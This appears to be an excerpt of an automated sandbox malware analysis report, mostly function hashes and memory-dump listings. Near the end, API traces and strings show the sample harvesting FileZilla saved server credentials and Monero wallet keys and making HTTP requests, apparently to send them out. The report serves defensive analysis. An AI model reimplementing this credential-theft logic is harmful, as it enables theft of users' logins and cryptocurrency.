                      • Opcode ID: 110aece7e27fe408f2eea11fc9b139dcf5647f68ce94831dabcfcc7fe1083d5a
                      • Instruction ID: 21edc8ee46dbcc6a1b2402a122d29241abba85c49f40eaca4e535fa34fb66e76
                      • Opcode Fuzzy Hash: 110aece7e27fe408f2eea11fc9b139dcf5647f68ce94831dabcfcc7fe1083d5a
                      • Instruction Fuzzy Hash: CE11847184410DFBEB25EBA0DC599ED7378EF10300F4146A9E51A56093EF382B4ACB92
                      Function 00AD780C Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: '@z
                      • API String ID: 0-1379757296
                      • Opcode ID: b802ee742f54fd9361cc0d01c42d01d41d8531931d9906c427a7407087e64662
                      • Instruction ID: b1ff4499cce856ea0c5c33f928424634d871e82bb4f80ebc0ce259fcb6edf688
                      • Opcode Fuzzy Hash: b802ee742f54fd9361cc0d01c42d01d41d8531931d9906c427a7407087e64662
                      • Instruction Fuzzy Hash: C3812AF3E086144FF300AA79DC8476ABAD7EBD4760F1A863DDAC447784ED7918058682
                      Function 00AC8606 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Jm~_
                      • API String ID: 0-3750373163
                      • Opcode ID: d5686b813c9d25f15be2dbb4d8a80e61a5a9f6e1d970a29fd99ca7d7f615ca54
                      • Instruction ID: 947962fde4a0731874ada8186f1b798fd3c1ea9c233845c790f4abe194e03067
                      • Opcode Fuzzy Hash: d5686b813c9d25f15be2dbb4d8a80e61a5a9f6e1d970a29fd99ca7d7f615ca54
                      • Instruction Fuzzy Hash: CE611AF360D2105FE30C9E29EC9167AB7DAEBD4320F26863EE6C5C3784E9755C018696
                      Function 009A2CFA Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: nn:<
                      • API String ID: 0-2989628408
                      • Opcode ID: 3f2c46f2724d79a6ee10391bd59e067555526121434a8ea136c17e7e89a60683
                      • Instruction ID: 38ef3355dc877ed563c048cd0d1762067a04a4bd58a269227c24da398d5c5bea
                      • Opcode Fuzzy Hash: 3f2c46f2724d79a6ee10391bd59e067555526121434a8ea136c17e7e89a60683
                      • Instruction Fuzzy Hash: 4D4129F3A082145BF3146E29EC4576AB7D6EBD4720F1B893DEE84C3B44E9395C054286
                      Function 009AE977 Relevance: .2, Instructions: 234COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fb79041cd93ee0e5ad446353b5dcf20259fef8ab56547fe2010dad0bbc5e967c
                      • Instruction ID: d4a927126916c25f13b87546f96321ec18b5ef899f122ed443ba8f01c5fbf458
                      • Opcode Fuzzy Hash: fb79041cd93ee0e5ad446353b5dcf20259fef8ab56547fe2010dad0bbc5e967c
                      • Instruction Fuzzy Hash: 9D6137F3A096109FE3046A6DDC8176ABADAEBD4730F2B463DDAC4D7380E5795C0582D2
                      Function 00B939C6 Relevance: .2, Instructions: 181COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1a10938b40d76003cd94033e1e912592a5e523b153749e6bd9302ebff48a3dc
                      • Instruction ID: acfab9a6f2eeb28f959ff7d06f1f2690ef2f313303069f3f8b0f4a1559bb2447
                      • Opcode Fuzzy Hash: c1a10938b40d76003cd94033e1e912592a5e523b153749e6bd9302ebff48a3dc
                      • Instruction Fuzzy Hash: D15189F350C204DBDB006A19DC8163EF7E9EB94B20F39897EDAC697300F6355A119697
                      Function 00A25A5C Relevance: .2, Instructions: 180COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5fb0dc16412bfe5ec40a57fe110c650c845b108004d44ac79d5f2c30d9ba2fbd
                      • Instruction ID: b3d75cabf93b26c1ca83a4efd7a575894993ea3f860f6fafb5fa3d2385e13dcb
                      • Opcode Fuzzy Hash: 5fb0dc16412bfe5ec40a57fe110c650c845b108004d44ac79d5f2c30d9ba2fbd
                      • Instruction Fuzzy Hash: 46510AF3A082009FE305AF3DDC8177AF7E5EF94720F16892DE6C4C7684DA3558458696
                      Function 00BC1043 Relevance: .1, Instructions: 95COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b59cf260b07c8802f77c1a27da40d6d762f8c0e4d34a628d30e08cebbae59e08
                      • Instruction ID: 74f6f8738b7642c6af6124f6346113e8f04f53bc51182eb690d83b91143735e5
                      • Opcode Fuzzy Hash: b59cf260b07c8802f77c1a27da40d6d762f8c0e4d34a628d30e08cebbae59e08
                      • Instruction Fuzzy Hash: 79317FB260C714AFD709BE58DC81ABEFBE5EF98760F06492DE6C583750D63158008B97
                      Function 00749750 Relevance: .0, Instructions: 15COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      Function 00740250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                        • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                        • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                        • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,0073148F,00000000), ref: 00739A5A
                        • Part of subcall function 007399C0: LocalFree.KERNEL32(0073148F), ref: 00739A90
                        • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                        • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,00750DBA,00750DB7,00750DB6,00750DB3), ref: 00740362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00740369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00740385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 007403CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 007403DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00740419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00740463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 0074051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 0074054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00740562
                      • lstrcat.KERNEL32(?,profile: null), ref: 00740571
                      • lstrcat.KERNEL32(?,url: ), ref: 00740580
                      • lstrcat.KERNEL32(?,00000000), ref: 00740593
                      • lstrcat.KERNEL32(?,00751678), ref: 007405A2
                      • lstrcat.KERNEL32(?,00000000), ref: 007405B5
                      • lstrcat.KERNEL32(?,0075167C), ref: 007405C4
                      • lstrcat.KERNEL32(?,login: ), ref: 007405D3
                      • lstrcat.KERNEL32(?,00000000), ref: 007405E6
                      • lstrcat.KERNEL32(?,00751688), ref: 007405F5
                      • lstrcat.KERNEL32(?,password: ), ref: 00740604
                      • lstrcat.KERNEL32(?,00000000), ref: 00740617
                      • lstrcat.KERNEL32(?,00751698), ref: 00740626
                      • lstrcat.KERNEL32(?,0075169C), ref: 00740635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 0074068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: 53af301724586ddd00abb16b60c0518b16da70786019cbf0ffd3446023f0f261
                      • Instruction ID: 44a252a695dc26c5520438440152583aed7d604d526072de834d3ef35c8a1472
                      • Opcode Fuzzy Hash: 53af301724586ddd00abb16b60c0518b16da70786019cbf0ffd3446023f0f261
                      • Instruction Fuzzy Hash: D2D13372950208EBDB04EBF4DD9AEEE737CEF54301F508418F506A6091DF78AA49DB62
                      Function 00735960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                        • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007359F8
                      • StrCmpCA.SHLWAPI(?,013EE290), ref: 00735A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00735B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013EE360,00000000,?,013E9ED8,00000000,?,00751A1C), ref: 00735E71
                      • lstrlen.KERNEL32(00000000), ref: 00735E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00735E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00735E9A
                      • lstrlen.KERNEL32(00000000), ref: 00735EAF
                      • lstrlen.KERNEL32(00000000), ref: 00735ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00735EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 00735F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00735F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00735F4C
                      • InternetCloseHandle.WININET(00000000), ref: 00735FB0
                      • InternetCloseHandle.WININET(00000000), ref: 00735FBD
                      • HttpOpenRequestA.WININET(00000000,013EE400,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00735BF8
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • InternetCloseHandle.WININET(00000000), ref: 00735FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
